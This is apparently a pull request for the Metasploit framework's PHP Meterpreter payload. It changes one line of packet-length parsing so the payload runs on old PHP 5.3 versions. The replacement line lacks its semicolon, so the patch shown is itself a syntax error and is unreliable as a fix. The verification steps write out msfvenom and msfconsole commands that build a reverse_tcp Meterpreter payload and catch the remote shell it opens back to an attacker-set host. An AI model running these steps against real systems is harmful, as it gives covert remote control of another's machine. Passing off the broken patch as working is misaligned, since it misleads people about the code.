### PR TITLE
Fix #95, unexpected syntax error '[' in PHP 5.3.6-13 that's causing Meterpreter to die

### DIFF
--- a/php/meterpreter/meterpreter.php
+++ b/php/meterpreter/meterpreter.php
@@ -1263,7 +1263,8 @@ while (false !== ($cnt = select($r, $w, $e, $t))) {
             }
             $xor = strrev(substr($header, 0, 4));
             $request = substr($header, 4);
-            $len = unpack("Nlen", xor_bytes($xor, substr($request, 0, 4)))['len'];
+            $len_array = unpack("Nlen", xor_bytes($xor, substr($request, 0, 4)));
+            $len = $len_array['len']
             # length of the whole packet, including header
             # packet type should always be 0, i.e. PACKET_TYPE_REQUEST
             while (strlen($request) < $len) {


### PR DESCRIPTION
This fixes a syntax error that seems to be specific to older versions of PHP, such as 5.3.6-13 (the one I tested). The error causes Meterpreter to die as soon as a session is opened.

Fix #95

## Verification

- [ ] Install PHP 5.3.6-13 or older
- [ ] Do: ```./msfvenom -p php/meterpreter/reverse_tcp lhost=IP lport=4444 -f raw -o /tmp/test.php```
- [ ] Start msfconsole
- [ ] Do: ```use exploit/multi/handler```
- [ ] Do: ```set payload php/meterpreter/reverse_tcp```
- [ ] Do: ```set lhost [IP]```
- [ ] Do: ```run```
- [ ] On the box with PHP 5.3.6-13, chmod +x and run test.php: ```php test.php```
- [ ] msfconsole should get a session.  And it should not die.